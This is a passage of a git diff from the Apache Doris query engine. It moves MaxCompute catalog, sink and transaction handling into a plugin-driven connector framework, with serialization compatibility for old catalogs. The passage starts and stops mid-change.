shuffleInfo.setOutputColExprIds(exprIds); - // Require local sort by partition columns so that rows for the same partition - // are grouped together. MaxCompute Storage API streams dynamic partition data - // and will close a partition writer once it sees a different partition; - // unsorted data causes "writer has been closed" errors. - List orderKeys = columnIdx.stream() - .map(idx -> new OrderKey(child().getOutput().get(idx), true, false)) - .collect(Collectors.toList()); - return new PhysicalProperties(shuffleInfo) - .withOrderSpec(new MustLocalSortOrderSpec(orderKeys)); - } - return PhysicalProperties.SINK_RANDOM_PARTITIONED; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/visitor/SinkVisitor.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/visitor/SinkVisitor.java index dcc6f715c9e3c8..5d4d77b774257c 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/visitor/SinkVisitor.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/visitor/SinkVisitor.java @@ -22,7 +22,6 @@ import org.apache.doris.nereids.analyzer.UnboundDictionarySink; import org.apache.doris.nereids.analyzer.UnboundHiveTableSink; import org.apache.doris.nereids.analyzer.UnboundIcebergTableSink; -import org.apache.doris.nereids.analyzer.UnboundMaxComputeTableSink; import org.apache.doris.nereids.analyzer.UnboundResultSink; import org.apache.doris.nereids.analyzer.UnboundTVFTableSink; import org.apache.doris.nereids.analyzer.UnboundTableSink; @@ -35,7 +34,6 @@ import org.apache.doris.nereids.trees.plans.logical.LogicalIcebergDeleteSink; import org.apache.doris.nereids.trees.plans.logical.LogicalIcebergMergeSink; import org.apache.doris.nereids.trees.plans.logical.LogicalIcebergTableSink; -import org.apache.doris.nereids.trees.plans.logical.LogicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalOlapTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalResultSink; import org.apache.doris.nereids.trees.plans.logical.LogicalSink; @@ -49,7 +47,6 @@ import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergDeleteSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergMergeSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergTableSink; -import org.apache.doris.nereids.trees.plans.physical.PhysicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalOlapTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalResultSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalSink; @@ -101,10 +98,6 @@ default R visitUnboundBlackholeSink(UnboundBlackholeSink unbound return visitLogicalSink(unboundBlackholeSink, context); } - default R visitUnboundMaxComputeTableSink(UnboundMaxComputeTableSink unboundTableSink, C context) { - return visitLogicalSink(unboundTableSink, context); - } - default R visitUnboundTVFTableSink(UnboundTVFTableSink unboundTVFTableSink, C context) { return visitLogicalSink(unboundTVFTableSink, context); } @@ -133,10 +126,6 @@ default R visitLogicalIcebergTableSink(LogicalIcebergTableSink i return visitLogicalTableSink(icebergTableSink, context); } - default R visitLogicalMaxComputeTableSink(LogicalMaxComputeTableSink mcTableSink, C context) { - return visitLogicalTableSink(mcTableSink, context); - } - default R visitLogicalIcebergDeleteSink(LogicalIcebergDeleteSink icebergDeleteSink, C context) { return visitLogicalTableSink(icebergDeleteSink, context); } @@ -197,10 +186,6 @@ default R visitPhysicalIcebergTableSink(PhysicalIcebergTableSink return visitPhysicalTableSink(icebergTableSink, context); } - default R visitPhysicalMaxComputeTableSink(PhysicalMaxComputeTableSink mcTableSink, C context) { - return visitPhysicalTableSink(mcTableSink, context); - } - default R visitPhysicalIcebergDeleteSink(PhysicalIcebergDeleteSink icebergDeleteSink, C context) { return visitPhysicalTableSink(icebergDeleteSink, context); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java index 51a933e3cd8c63..afea1bde903b35 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java +++ b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java @@ -165,9 +165,6 @@ import org.apache.doris.datasource.lakesoul.LakeSoulExternalCatalog; import org.apache.doris.datasource.lakesoul.LakeSoulExternalDatabase; import org.apache.doris.datasource.lakesoul.LakeSoulExternalTable; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalDatabase; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; import org.apache.doris.datasource.paimon.PaimonDLFExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalDatabase; @@ -394,7 +391,6 @@ public class GsonUtils { .registerSubtype(PaimonHMSExternalCatalog.class, PaimonHMSExternalCatalog.class.getSimpleName()) .registerSubtype(PaimonFileExternalCatalog.class, PaimonFileExternalCatalog.class.getSimpleName()) .registerSubtype(PaimonRestExternalCatalog.class, PaimonRestExternalCatalog.class.getSimpleName()) - .registerSubtype(MaxComputeExternalCatalog.class, MaxComputeExternalCatalog.class.getSimpleName()) .registerSubtype(LakeSoulExternalCatalog.class, LakeSoulExternalCatalog.class.getSimpleName()) .registerSubtype(TestExternalCatalog.class, TestExternalCatalog.class.getSimpleName()) .registerSubtype(PaimonDLFExternalCatalog.class, PaimonDLFExternalCatalog.class.getSimpleName()) @@ -409,7 +405,10 @@ public class GsonUtils { PluginDrivenExternalCatalog.class, "JdbcExternalCatalog") // Migrate old Trino-connector catalogs to PluginDriven on deserialization .registerCompatibleSubtype( - PluginDrivenExternalCatalog.class, "TrinoConnectorExternalCatalog"); + PluginDrivenExternalCatalog.class, "TrinoConnectorExternalCatalog") + // Migrate old MaxCompute catalogs to PluginDriven on deserialization + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "MaxComputeExternalCatalog"); if (Config.isNotCloudMode()) { dsTypeAdapterFactory .registerSubtype(InternalCatalog.class, InternalCatalog.class.getSimpleName()); @@ -449,7 +448,6 @@ public class GsonUtils { .registerSubtype(IcebergExternalDatabase.class, IcebergExternalDatabase.class.getSimpleName()) .registerSubtype(LakeSoulExternalDatabase.class, LakeSoulExternalDatabase.class.getSimpleName()) .registerSubtype(PaimonExternalDatabase.class, PaimonExternalDatabase.class.getSimpleName()) - .registerSubtype(MaxComputeExternalDatabase.class, MaxComputeExternalDatabase.class.getSimpleName()) .registerSubtype(ExternalInfoSchemaDatabase.class, ExternalInfoSchemaDatabase.class.getSimpleName()) .registerSubtype(ExternalMysqlDatabase.class, ExternalMysqlDatabase.class.getSimpleName()) .registerSubtype(TestExternalDatabase.class, TestExternalDatabase.class.getSimpleName()) @@ -460,7 +458,9 @@ public class GsonUtils { .registerCompatibleSubtype( PluginDrivenExternalDatabase.class, "JdbcExternalDatabase") .registerCompatibleSubtype( - PluginDrivenExternalDatabase.class, "TrinoConnectorExternalDatabase"); + PluginDrivenExternalDatabase.class, "TrinoConnectorExternalDatabase") + .registerCompatibleSubtype( + PluginDrivenExternalDatabase.class, "MaxComputeExternalDatabase"); private static RuntimeTypeAdapterFactory tblTypeAdapterFactory = RuntimeTypeAdapterFactory.of( TableIf.class, "clazz").registerSubtype(ExternalTable.class, ExternalTable.class.getSimpleName()) @@ -469,7 +469,6 @@ public class GsonUtils { .registerSubtype(IcebergExternalTable.class, IcebergExternalTable.class.getSimpleName()) .registerSubtype(LakeSoulExternalTable.class, LakeSoulExternalTable.class.getSimpleName()) .registerSubtype(PaimonExternalTable.class, PaimonExternalTable.class.getSimpleName()) - .registerSubtype(MaxComputeExternalTable.class, MaxComputeExternalTable.class.getSimpleName()) .registerSubtype(ExternalInfoSchemaTable.class, ExternalInfoSchemaTable.class.getSimpleName()) .registerSubtype(ExternalMysqlTable.class, ExternalMysqlTable.class.getSimpleName()) .registerSubtype(TestExternalTable.class, TestExternalTable.class.getSimpleName()) @@ -481,6 +480,8 @@ public class GsonUtils { PluginDrivenExternalTable.class, "JdbcExternalTable") .registerCompatibleSubtype( PluginDrivenExternalTable.class, "TrinoConnectorExternalTable") + .registerCompatibleSubtype( + PluginDrivenExternalTable.class, "MaxComputeExternalTable") .registerSubtype(BrokerTable.class, BrokerTable.class.getSimpleName()) .registerSubtype(EsTable.class, EsTable.class.getSimpleName()) .registerSubtype(FunctionGenTable.class, FunctionGenTable.class.getSimpleName()) diff --git a/fe/fe-core/src/main/java/org/apache/doris/planner/MaxComputeTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/planner/MaxComputeTableSink.java deleted file mode 100644 index 98537fa0307dd0..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/planner/MaxComputeTableSink.java +++ /dev/null @@ -1,113 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.planner; - -import org.apache.doris.common.AnalysisException; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.nereids.trees.plans.commands.insert.InsertCommandContext; -import org.apache.doris.nereids.trees.plans.commands.insert.MCInsertCommandContext; -import org.apache.doris.thrift.TDataSink; -import org.apache.doris.thrift.TDataSinkType; -import org.apache.doris.thrift.TExplainLevel; -import org.apache.doris.thrift.TFileFormatType; -import org.apache.doris.thrift.TMaxComputeTableSink; - -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Optional; -import java.util.Set; -import java.util.stream.Collectors; - -public class MaxComputeTableSink extends BaseExternalTableDataSink { - - private final MaxComputeExternalTable targetTable; - - public MaxComputeTableSink(MaxComputeExternalTable targetTable) { - super(); - this.targetTable = targetTable; - } - - @Override - protected Set supportedFileFormatTypes() { - return new HashSet<>(); - } - - @Override - public String getExplainString(String prefix, TExplainLevel explainLevel) { - StringBuilder strBuilder = new StringBuilder(); - strBuilder.append(prefix).append("MAXCOMPUTE TABLE SINK\n"); - if (explainLevel == TExplainLevel.BRIEF) { - return strBuilder.toString(); - } - strBuilder.append(prefix).append(" TABLE: ").append(targetTable.getName()).append("\n"); - return strBuilder.toString(); - } - - @Override - public void bindDataSink(Optional insertCtx) throws AnalysisException { - TMaxComputeTableSink tSink = new TMaxComputeTableSink(); - - MaxComputeExternalCatalog catalog = (MaxComputeExternalCatalog) targetTable.getCatalog(); - - tSink.setProperties(catalog.getProperties()); - tSink.setEndpoint(catalog.getEndpoint()); - tSink.setProject(catalog.getDefaultProject()); - tSink.setTableName(targetTable.getName()); - tSink.setQuota(catalog.getQuota()); - tSink.setConnectTimeout(catalog.getConnectTimeout()); - tSink.setReadTimeout(catalog.getReadTimeout()); - tSink.setRetryCount(catalog.getRetryTimes()); - - // Partition columns - List partitionColumnNames = targetTable.getPartitionColumns().stream() - .map(col -> col.getName()) - .collect(Collectors.toList()); - if (!partitionColumnNames.isEmpty()) { - tSink.setPartitionColumns(partitionColumnNames); - } - - if (insertCtx.isPresent() && insertCtx.get() instanceof MCInsertCommandContext) { - MCInsertCommandContext mcCtx = (MCInsertCommandContext) insertCtx.get(); - // Static partition spec - Map staticPartitionSpec = mcCtx.getStaticPartitionSpec(); - if (staticPartitionSpec != null && !staticPartitionSpec.isEmpty()) { - tSink.setStaticPartitionSpec(staticPartitionSpec); - } - } - - // Note: writeSessionId is set later by MCInsertExecutor.beforeExec() - // after MCTransaction.beginInsert() creates the Storage API session. - - tDataSink = new TDataSink(TDataSinkType.MAXCOMPUTE_TABLE_SINK); - tDataSink.setMaxComputeTableSink(tSink); - } - - /** - * Called by MCInsertExecutor.beforeExec() to inject runtime write context - * after MCTransaction.beginInsert() creates the Storage API session. - * This must be called before fragments are sent to BE (i.e., before execImpl). - */ - public void setWriteContext(long txnId, String writeSessionId) { - if (tDataSink != null && tDataSink.isSetMaxComputeTableSink()) { - tDataSink.getMaxComputeTableSink().setTxnId(txnId); - tDataSink.getMaxComputeTableSink().setWriteSessionId(writeSessionId); - } - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/planner/PluginDrivenTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/planner/PluginDrivenTableSink.java index c04be2c01c42e0..9ca9985ccb1d79 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/planner/PluginDrivenTableSink.java +++ b/fe/fe-core/src/main/java/org/apache/doris/planner/PluginDrivenTableSink.java @@ -20,10 +20,17 @@ import org.apache.doris.catalog.Column; import org.apache.doris.common.AnalysisException; import org.apache.doris.common.util.LocationPath; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorWriteHandle; +import org.apache.doris.connector.api.write.ConnectorSinkPlan; import org.apache.doris.connector.api.write.ConnectorWriteConfig; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; import org.apache.doris.connector.api.write.ConnectorWriteType; import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.nereids.trees.plans.commands.insert.InsertCommandContext; +import org.apache.doris.nereids.trees.plans.commands.insert.PluginDrivenInsertCommandContext; import org.apache.doris.thrift.TDataSink; import org.apache.doris.thrift.TDataSinkType; import org.apache.doris.thrift.TExplainLevel; @@ -41,6 +48,7 @@ import org.apache.logging.log4j.Logger; import java.util.ArrayList; +import java.util.Collections; import java.util.EnumSet; import java.util.HashSet; import java.util.List; @@ -96,13 +104,54 @@ public class PluginDrivenTableSink extends BaseExternalTableDataSink { public static final String PROP_JDBC_POOL_KEEP_ALIVE = "connection_pool_keep_alive"; private final PluginDrivenExternalTable targetTable; + // Config-bag mode: the connector returns a ConnectorWriteConfig (property bag) and the + // engine builds the Thrift sink (jdbc / hive-shaped file writes). Null in plan-provider mode. private final ConnectorWriteConfig writeConfig; + // Plan-provider mode (W5): the connector builds its own opaque TDataSink via planWrite(). + // Mutually exclusive with writeConfig -- exactly one is non-null. Used by connectors whose + // sink cannot be expressed as a generic ConnectorWriteConfig (e.g. maxcompute / iceberg). + private final ConnectorWritePlanProvider writePlanProvider; + private final ConnectorSession connectorSession; + private final ConnectorTableHandle tableHandle; + private final List connectorColumns; public PluginDrivenTableSink(PluginDrivenExternalTable targetTable, ConnectorWriteConfig writeConfig) { super(); this.targetTable = targetTable; this.writeConfig = writeConfig; + this.writePlanProvider = null; + this.connectorSession = null; + this.tableHandle = null; + this.connectorColumns = null; + } + + /** + * Plan-provider mode (W5): the connector supplies a {@link ConnectorWritePlanProvider} + * and builds its own opaque {@link TDataSink} via + * {@link ConnectorWritePlanProvider#planWrite}. The config-bag constructor remains for + * connectors that only provide a {@link ConnectorWriteConfig} (e.g. jdbc). + */ + public PluginDrivenTableSink(PluginDrivenExternalTable targetTable, + ConnectorWritePlanProvider writePlanProvider, ConnectorSession connectorSession, + ConnectorTableHandle tableHandle, List connectorColumns) { + super(); + this.targetTable = targetTable; + this.writeConfig = null; + this.writePlanProvider = writePlanProvider; + this.connectorSession = connectorSession; + this.tableHandle = tableHandle; + this.connectorColumns = connectorColumns; + } + + /** + * The connector session this sink's write plan reads (plan-provider mode). The insert + * executor binds the connector transaction onto it (via + * {@link ConnectorSession#setCurrentTransaction}) before {@code bindDataSink} runs, so + * the connector's {@code planWrite} sees the active transaction. + */ + public ConnectorSession getConnectorSession() { + return connectorSession; } @Override @@ -118,6 +167,13 @@ public String getExplainString(String prefix, TExplainLevel explainLevel) { if (explainLevel == TExplainLevel.BRIEF) { return sb.toString(); } + if (writeConfig == null) { + // Plan-provider mode (W5, e.g. maxcompute): the connector builds its own sink via + // planWrite; there is no ConnectorWriteConfig to describe here. + sb.append(prefix).append(" WRITE: plan-provider\n"); + sb.append(prefix).append(" TABLE: ").append(targetTable.getName()).append("\n"); + return sb.toString(); + } sb.append(prefix).append(" WRITE TYPE: ").append(writeConfig.getWriteType()).append("\n"); sb.append(prefix).append(" TABLE: ").append(targetTable.getName()).append("\n"); if (writeConfig.getWriteType() == ConnectorWriteType.JDBC_WRITE) { @@ -142,6 +198,10 @@ public String getExplainString(String prefix, TExplainLevel explainLevel) { @Override public void bindDataSink(Optional insertCtx) throws AnalysisException { + if (writePlanProvider != null) { + bindViaWritePlanProvider(insertCtx); + return; + } ConnectorWriteType writeType = writeConfig.getWriteType(); switch (writeType) { case FILE_WRITE: @@ -156,6 +216,30 @@ public void bindDataSink(Optional insertCtx) } } + /** + * Plan-provider mode: delegate sink construction to the connector, which returns its own + * opaque {@link TDataSink}; the engine dispatches it to BE unchanged. The + * {@link ConnectorWriteHandle} carries the bound target table handle and write columns. + * + *

Connector-specific write context (OVERWRITE flag, static partition spec) is read from + * the {@link PluginDrivenInsertCommandContext} and passed through to the connector. The + * W-phase established this seam with an empty context; the per-connector adopter (P4+) fills + * it here.

+ */ + private void bindViaWritePlanProvider(Optional insertCtx) { + boolean overwrite = false; + Map writeContext = Collections.emptyMap(); + if (insertCtx.isPresent() && insertCtx.get() instanceof PluginDrivenInsertCommandContext) { + PluginDrivenInsertCommandContext ctx = (PluginDrivenInsertCommandContext) insertCtx.get(); + overwrite = ctx.isOverwrite(); + writeContext = ctx.getStaticPartitionSpec(); + } + ConnectorWriteHandle handle = new PluginDrivenWriteHandle( + tableHandle, connectorColumns, overwrite, writeContext); + ConnectorSinkPlan sinkPlan = writePlanProvider.planWrite(connectorSession, handle); + this.tDataSink = sinkPlan.getDataSink(); + } + /** * Returns the write config associated with this sink. * Used by the insert executor to access connector write configuration. @@ -310,4 +394,40 @@ private boolean isWellKnownProperty(String key) { || key.equals(PROP_ORIGINAL_WRITE_PATH) || key.startsWith("jdbc_"); } + + /** Bound {@link ConnectorWriteHandle} passed to {@link ConnectorWritePlanProvider#planWrite}. */ + private static final class PluginDrivenWriteHandle implements ConnectorWriteHandle { + private final ConnectorTableHandle tableHandle; + private final List columns; + private final boolean overwrite; + private final Map writeContext; + + private PluginDrivenWriteHandle(ConnectorTableHandle tableHandle, List columns, + boolean overwrite, Map writeContext) { + this.tableHandle = tableHandle; + this.columns = columns; + this.overwrite = overwrite; + this.writeContext = writeContext; + } + + @Override + public ConnectorTableHandle getTableHandle() { + return tableHandle; + } + + @Override + public List getColumns() { + return columns; + } + + @Override + public boolean isOverwrite() { + return overwrite; + } + + @Override + public Map getWriteContext() { + return writeContext; + } + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/qe/Coordinator.java b/fe/fe-core/src/main/java/org/apache/doris/qe/Coordinator.java index 474a76ff392c68..fa73bfacc25cdd 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/qe/Coordinator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/qe/Coordinator.java @@ -39,9 +39,6 @@ import org.apache.doris.common.util.TimeUtils; import org.apache.doris.datasource.ExternalScanNode; import org.apache.doris.datasource.FileQueryScanNode; -import org.apache.doris.datasource.hive.HMSTransaction; -import org.apache.doris.datasource.iceberg.IcebergTransaction; -import org.apache.doris.datasource.maxcompute.MCTransaction; import org.apache.doris.load.loadv2.LoadJob; import org.apache.doris.metric.MetricRepo; import org.apache.doris.mysql.MysqlCommand; @@ -129,6 +126,8 @@ import org.apache.doris.thrift.TTabletCommitInfo; import org.apache.doris.thrift.TTopnFilterDesc; import org.apache.doris.thrift.TUniqueId; +import org.apache.doris.transaction.CommitDataSerializer; +import org.apache.doris.transaction.Transaction; import org.apache.doris.transaction.TransactionState; import org.apache.doris.transaction.TransactionStatus; import org.apache.doris.tso.TSOTimestamp; @@ -2635,17 +2634,17 @@ public void updateFragmentExecStatus(TReportExecStatusParams params) { if (params.isSetErrorTabletInfos()) { updateErrorTabletInfos(params.getErrorTabletInfos()); } - if (params.isSetHivePartitionUpdates()) { - ((HMSTransaction) Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId)) - .updateHivePartitionUpdates(params.getHivePartitionUpdates()); - } - if (params.isSetIcebergCommitDatas()) { - ((IcebergTransaction) Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId)) - .updateIcebergCommitData(params.getIcebergCommitDatas()); - } - if (params.isSetMcCommitDatas()) { - ((MCTransaction) Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId)) - .updateMCCommitData(params.getMcCommitDatas()); + if (params.isSetHivePartitionUpdates() || params.isSetIcebergCommitDatas() || params.isSetMcCommitDatas()) { + Transaction txn = Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId); + if (params.isSetHivePartitionUpdates()) { + CommitDataSerializer.feed(txn, params.getHivePartitionUpdates()); + } + if (params.isSetIcebergCommitDatas()) { + CommitDataSerializer.feed(txn, params.getIcebergCommitDatas()); + } + if (params.isSetMcCommitDatas()) { + CommitDataSerializer.feed(txn, params.getMcCommitDatas()); + } } if (ctx.done) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/qe/runtime/LoadProcessor.java b/fe/fe-core/src/main/java/org/apache/doris/qe/runtime/LoadProcessor.java index 38ba2ebbc79501..ae7d11979d677d 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/qe/runtime/LoadProcessor.java +++ b/fe/fe-core/src/main/java/org/apache/doris/qe/runtime/LoadProcessor.java @@ -21,9 +21,6 @@ import org.apache.doris.common.MarkedCountDownLatch; import org.apache.doris.common.Status; import org.apache.doris.common.util.DebugUtil; -import org.apache.doris.datasource.hive.HMSTransaction; -import org.apache.doris.datasource.iceberg.IcebergTransaction; -import org.apache.doris.datasource.maxcompute.MCTransaction; import org.apache.doris.nereids.util.Utils; import org.apache.doris.qe.AbstractJobProcessor; import org.apache.doris.qe.CoordinatorContext; @@ -32,6 +29,8 @@ import org.apache.doris.thrift.TReportExecStatusParams; import org.apache.doris.thrift.TStatusCode; import org.apache.doris.thrift.TUniqueId; +import org.apache.doris.transaction.CommitDataSerializer; +import org.apache.doris.transaction.Transaction; import com.google.common.collect.Lists; import org.apache.logging.log4j.LogManager; @@ -228,17 +227,17 @@ protected void doProcessReportExecStatus(TReportExecStatusParams params, SingleF loadContext.updateErrorTabletInfos(params.getErrorTabletInfos()); } long txnId = loadContext.getTransactionId(); - if (params.isSetHivePartitionUpdates()) { - ((HMSTransaction) Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId)) - .updateHivePartitionUpdates(params.getHivePartitionUpdates()); - } - if (params.isSetIcebergCommitDatas()) { - ((IcebergTransaction) Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId)) - .updateIcebergCommitData(params.getIcebergCommitDatas()); - } - if (params.isSetMcCommitDatas()) { - ((MCTransaction) Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId)) - .updateMCCommitData(params.getMcCommitDatas()); + if (params.isSetHivePartitionUpdates() || params.isSetIcebergCommitDatas() || params.isSetMcCommitDatas()) { + Transaction txn = Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId); + if (params.isSetHivePartitionUpdates()) { + CommitDataSerializer.feed(txn, params.getHivePartitionUpdates()); + } + if (params.isSetIcebergCommitDatas()) { + CommitDataSerializer.feed(txn, params.getIcebergCommitDatas()); + } + if (params.isSetMcCommitDatas()) { + CommitDataSerializer.feed(txn, params.getMcCommitDatas()); + } } if (fragmentTask.isDone()) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/service/FrontendServiceImpl.java b/fe/fe-core/src/main/java/org/apache/doris/service/FrontendServiceImpl.java index fb74d7ca29a02a..35e0961d333af0 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/service/FrontendServiceImpl.java +++ b/fe/fe-core/src/main/java/org/apache/doris/service/FrontendServiceImpl.java @@ -89,7 +89,6 @@ import org.apache.doris.datasource.ExternalDatabase; import org.apache.doris.datasource.InternalCatalog; import org.apache.doris.datasource.SplitSource; -import org.apache.doris.datasource.maxcompute.MCTransaction; import org.apache.doris.encryption.EncryptionKey; import org.apache.doris.info.TableRefInfo; import org.apache.doris.insertoverwrite.InsertOverwriteManager; @@ -3696,12 +3695,12 @@ public TMaxComputeBlockIdResult getMaxComputeBlockIdRange(TMaxComputeBlockIdRequ try { Transaction transaction = Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr() .getTxnById(request.getTxnId()); - if (!(transaction instanceof MCTransaction)) { + if (!transaction.supportsWriteBlockAllocation()) { throw new UserException("Transaction " + request.getTxnId() + " is not a MaxCompute transaction"); } - long start = ((MCTransaction) transaction).allocateBlockIdRange( + long start = transaction.allocateWriteBlockRange( request.getWriteSessionId(), request.getLength()); result.setStart(start); result.setLength(request.getLength()); diff --git a/fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java b/fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java index f4d9d535f84da9..76b6e55482c803 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java @@ -57,17 +57,20 @@ import org.apache.doris.common.util.NetUtils; import org.apache.doris.common.util.TimeUtils; import org.apache.doris.common.util.Util; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.datasource.CatalogIf; import org.apache.doris.datasource.CatalogMgr; import org.apache.doris.datasource.ExternalCatalog; import org.apache.doris.datasource.ExternalMetaCacheMgr; import org.apache.doris.datasource.ExternalTable; import org.apache.doris.datasource.InternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.datasource.TablePartitionValues; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalTable; import org.apache.doris.datasource.hive.HiveExternalMetaCache; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.metacache.MetaCacheEntryStats; import org.apache.doris.datasource.mvcc.MvccUtil; import org.apache.doris.job.common.JobType; @@ -136,6 +139,7 @@ import java.util.List; import java.util.Locale; import java.util.Map; +import java.util.Optional; import java.util.concurrent.TimeUnit; import java.util.stream.Stream; @@ -1307,8 +1311,8 @@ private static TFetchSchemaTableDataResult partitionMetadataResult(TMetadataTabl if (catalog instanceof InternalCatalog) { return dealInternalCatalog((Database) db, table); - } else if (catalog instanceof MaxComputeExternalCatalog) { - return dealMaxComputeCatalog((MaxComputeExternalCatalog) catalog, (ExternalTable) table); + } else if (catalog instanceof PluginDrivenExternalCatalog) { + return dealPluginDrivenCatalog((PluginDrivenExternalCatalog) catalog, (ExternalTable) table); } else if (catalog instanceof HMSExternalCatalog) { return dealHMSCatalog((HMSExternalCatalog) catalog, (ExternalTable) table); } @@ -1334,14 +1338,19 @@ private static TFetchSchemaTableDataResult dealHMSCatalog(HMSExternalCatalog cat return result; } - private static TFetchSchemaTableDataResult dealMaxComputeCatalog(MaxComputeExternalCatalog catalog, + private static TFetchSchemaTableDataResult dealPluginDrivenCatalog(PluginDrivenExternalCatalog catalog, ExternalTable table) { List dataBatch = Lists.newArrayList(); - List partitionNames = catalog.listPartitionNames(table.getRemoteDbName(), table.getRemoteName()); - for (String partition : partitionNames) { - TRow trow = new TRow(); - trow.addToColumnValue(new TCell().setStringVal(partition)); - dataBatch.add(trow); + ConnectorSession session = catalog.buildConnectorSession(); + ConnectorMetadata metadata = catalog.getConnector().getMetadata(session); + Optional handle = metadata.getTableHandle( + session, table.getRemoteDbName(), table.getRemoteName()); + if (handle.isPresent()) { + for (String partition : metadata.listPartitionNames(session, handle.get())) { + TRow trow = new TRow(); + trow.addToColumnValue(new TCell().setStringVal(partition)); + dataBatch.add(trow); + } } TFetchSchemaTableDataResult result = new TFetchSchemaTableDataResult(); result.setDataBatch(dataBatch); diff --git a/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionValuesTableValuedFunction.java b/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionValuesTableValuedFunction.java index 494a68edf3af9c..12e27c1c7f9402 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionValuesTableValuedFunction.java +++ b/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionValuesTableValuedFunction.java @@ -27,7 +27,6 @@ import org.apache.doris.datasource.CatalogIf; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalTable; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.mysql.privilege.PrivPredicate; import org.apache.doris.nereids.exceptions.AnalysisException; import org.apache.doris.qe.ConnectContext; @@ -111,8 +110,7 @@ public static TableIf analyzeAndGetTable(String catalogName, String dbName, Stri throw new AnalysisException("can not find catalog: " + catalogName); } // disallow unsupported catalog - if (!(catalog.isInternalCatalog() || catalog instanceof HMSExternalCatalog - || catalog instanceof MaxComputeExternalCatalog)) { + if (!(catalog.isInternalCatalog() || catalog instanceof HMSExternalCatalog)) { throw new AnalysisException(String.format("Catalog of type '%s' is not allowed in ShowPartitionsStmt", catalog.getType())); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java b/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java index 160399bfd000b3..ff0584dc864d48 100644 --- 